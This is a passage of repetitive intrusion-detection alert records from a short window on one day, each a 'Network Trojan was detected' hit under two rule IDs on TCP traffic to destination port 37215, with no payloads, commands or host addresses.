          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105288
          SID:2829579
          Source Port:48954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207743
          SID:2829579
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993150
          SID:2835222
          Source Port:60914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864351
          SID:2829579
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.989014
          SID:2829579
          Source Port:53516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286617
          SID:2829579
          Source Port:54618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014788
          SID:2835222
          Source Port:50772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721703
          SID:2829579
          Source Port:33346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990916
          SID:2835222
          Source Port:46954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.088557
          SID:2835222
          Source Port:36890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924363
          SID:2829579
          Source Port:37812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027081
          SID:2829579
          Source Port:49024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162255
          SID:2829579
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539490
          SID:2829579
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944450
          SID:2835222
          Source Port:45744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599871
          SID:2835222
          Source Port:54128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.646668
          SID:2835222
          Source Port:37152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165446
          SID:2829579
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101000
          SID:2835222
          Source Port:34198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101961
          SID:2829579
          Source Port:58564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476153
          SID:2829579
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103971
          SID:2835222
          Source Port:57522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159487
          SID:2829579
          Source Port:41824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740697
          SID:2835222
          Source Port:43346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282558
          SID:2835222
          Source Port:35790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286161
          SID:2829579
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.887843
          SID:2835222
          Source Port:34690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916509
          SID:2829579
          Source Port:39020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227860
          SID:2835222
          Source Port:49458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.955184
          SID:2829579
          Source Port:49084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930146
          SID:2835222
          Source Port:57562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081141
          SID:2835222
          Source Port:52066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643495
          SID:2835222
          Source Port:41754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038937
          SID:2835222
          Source Port:54746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156936
          SID:2829579
          Source Port:47710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033674
          SID:2829579
          Source Port:56438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272127
          SID:2835222
          Source Port:46388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244174
          SID:2835222
          Source Port:35458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819952
          SID:2829579
          Source Port:60624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820703
          SID:2829579
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399068
          SID:2835222
          Source Port:47786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718638
          SID:2829579
          Source Port:53372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478123
          SID:2829579
          Source Port:44572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476839
          SID:2835222
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227262
          SID:2829579
          Source Port:48980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928080
          SID:2829579
          Source Port:41302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716968
          SID:2829579
          Source Port:35010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244223
          SID:2829579
          Source Port:58096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540105
          SID:2835222
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287995
          SID:2835222
          Source Port:41232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272668
          SID:2829579
          Source Port:56926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944770
          SID:2835222
          Source Port:48232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227105
          SID:2829579
          Source Port:56358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480838
          SID:2829579
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.698479
          SID:2835222
          Source Port:44090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105325
          SID:2835222
          Source Port:58596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248083
          SID:2835222
          Source Port:52428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918924
          SID:2829579
          Source Port:44124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.720164
          SID:2829579
          Source Port:57120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292730
          SID:2829579
          Source Port:48636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014934
          SID:2835222
          Source Port:44198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.562181
          SID:2829579
          Source Port:34848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033909
          SID:2835222
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594081
          SID:2829579
          Source Port:33660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929183
          SID:2829579
          Source Port:55506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862620
          SID:2829579
          Source Port:37640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222900
          SID:2829579
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921186
          SID:2829579
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905326
          SID:2829579
          Source Port:36900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035494
          SID:2835222
          Source Port:41986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869287
          SID:2835222
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169412
          SID:2835222
          Source Port:37562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028775
          SID:2829579
          Source Port:38324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566014
          SID:2835222
          Source Port:50644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466026
          SID:2829579
          Source Port:56520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715474
          SID:2829579
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085467
          SID:2829579
          Source Port:52060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821825
          SID:2829579
          Source Port:45158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718673
          SID:2829579
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104288
          SID:2829579
          Source Port:59744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207894
          SID:2829579
          Source Port:36512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399241
          SID:2829579
          Source Port:54380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715371
          SID:2835222
          Source Port:47306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644960
          SID:2829579
          Source Port:48798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928821
          SID:2829579
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606923
          SID:2829579
          Source Port:59428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166131
          SID:2835222
          Source Port:58288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414143
          SID:2829579
          Source Port:59132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719637
          SID:2829579
          Source Port:57964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604863
          SID:2829579
          Source Port:43028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286926
          SID:2829579
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226369
          SID:2829579
          Source Port:38802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945050
          SID:2835222
          Source Port:35348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861077
          SID:2835222
          Source Port:43876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275937
          SID:2835222
          Source Port:53780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288279
          SID:2829579
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223062
          SID:2829579
          Source Port:35360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245417
          SID:2829579
          Source Port:59780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864305
          SID:2835222
          Source Port:55292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724121
          SID:2835222
          Source Port:49348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396811
          SID:2835222
          Source Port:39112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594909
          SID:2835222
          Source Port:49956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890455
          SID:2835222
          Source Port:45508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163182
          SID:2829579
          Source Port:53926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296250
          SID:2829579
          Source Port:52560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398389
          SID:2829579
          Source Port:38496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037931
          SID:2829579
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684563
          SID:2835222
          Source Port:58828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292404
          SID:2829579
          Source Port:32964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087265
          SID:2835222
          Source Port:44202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241901
          SID:2835222
          Source Port:54086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645351
          SID:2829579
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947939
          SID:2829579
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996308
          SID:2835222
          Source Port:47570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017463
          SID:2835222
          Source Port:54390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989921
          SID:2829579
          Source Port:40884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944513
          SID:2835222
          Source Port:55696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418753
          SID:2829579
          Source Port:52178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715381
          SID:2829579
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694124
          SID:2835222
          Source Port:52254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014318
          SID:2835222
          Source Port:43056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034792
          SID:2835222
          Source Port:49058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274453
          SID:2829579
          Source Port:56660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.295306
          SID:2835222
          Source Port:40558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413021
          SID:2835222
          Source Port:43442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296690
          SID:2829579
          Source Port:52392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008179
          SID:2835222
          Source Port:35340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230293
          SID:2829579
          Source Port:38062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713635
          SID:2835222
          Source Port:38990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567648
          SID:2835222
          Source Port:37428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160133
          SID:2835222
          Source Port:35354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039163
          SID:2835222
          Source Port:33040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950339
          SID:2835222
          Source Port:52336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077205
          SID:2829579
          Source Port:52006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822855
          SID:2829579
          Source Port:33100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558941
          SID:2829579
          Source Port:48742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038392
          SID:2835222
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224228
          SID:2835222
          Source Port:43464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930339
          SID:2829579
          Source Port:56604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412522
          SID:2835222
          Source Port:39726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869198
          SID:2829579
          Source Port:41194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412654
          SID:2829579
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166741
          SID:2829579
          Source Port:37018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399638
          SID:2835222
          Source Port:45182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604197
          SID:2835222
          Source Port:54210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947358
          SID:2829579
          Source Port:50242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074536
          SID:2835222
          Source Port:47588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073734
          SID:2829579
          Source Port:34630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206514
          SID:2829579
          Source Port:54942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075408
          SID:2835222
          Source Port:50256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595249
          SID:2829579
          Source Port:59336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989726
          SID:2835222
          Source Port:53706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923256
          SID:2829579
          Source Port:34246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245378
          SID:2829579
          Source Port:45072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242330
          SID:2829579
          Source Port:60374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277367
          SID:2835222
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285908
          SID:2835222
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120653
          SID:2829579
          Source Port:40458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538015
          SID:2829579
          Source Port:56042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.992183
          SID:2829579
          Source Port:36980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034004
          SID:2829579
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990119
          SID:2835222
          Source Port:42352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821129
          SID:2829579
          Source Port:47660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249348
          SID:2835222
          Source Port:48524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415045
          SID:2829579
          Source Port:55716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598056
          SID:2829579
          Source Port:35982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715431
          SID:2829579
          Source Port:43032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926826
          SID:2835222
          Source Port:33812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243596
          SID:2835222
          Source Port:50608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719620
          SID:2829579
          Source Port:32962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540112
          SID:2835222
          Source Port:49474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718109
          SID:2835222
          Source Port:43138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242724
          SID:2835222
          Source Port:45022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820891
          SID:2829579
          Source Port:54010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292168
          SID:2835222
          Source Port:33496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929814
          SID:2829579
          Source Port:47354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552464
          SID:2835222
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419507
          SID:2829579
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715204
          SID:2835222
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600991
          SID:2835222
          Source Port:46526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904609
          SID:2829579
          Source Port:53580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399410
          SID:2829579
          Source Port:37074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480648
          SID:2835222
          Source Port:54482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243955
          SID:2829579
          Source Port:51086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039072
          SID:2829579
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159563
          SID:2835222
          Source Port:51144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490275
          SID:2835222
          Source Port:43708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472364
          SID:2829579
          Source Port:51722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558317
          SID:2835222
          Source Port:35860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893142
          SID:2835222
          Source Port:53496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206364
          SID:2835222
          Source Port:46030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910652
          SID:2829579
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288026
          SID:2829579
          Source Port:51358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568092
          SID:2835222
          Source Port:48836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080130
          SID:2835222
          Source Port:43072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034168
          SID:2829579
          Source Port:33764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.952019
          SID:2829579
          Source Port:40734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
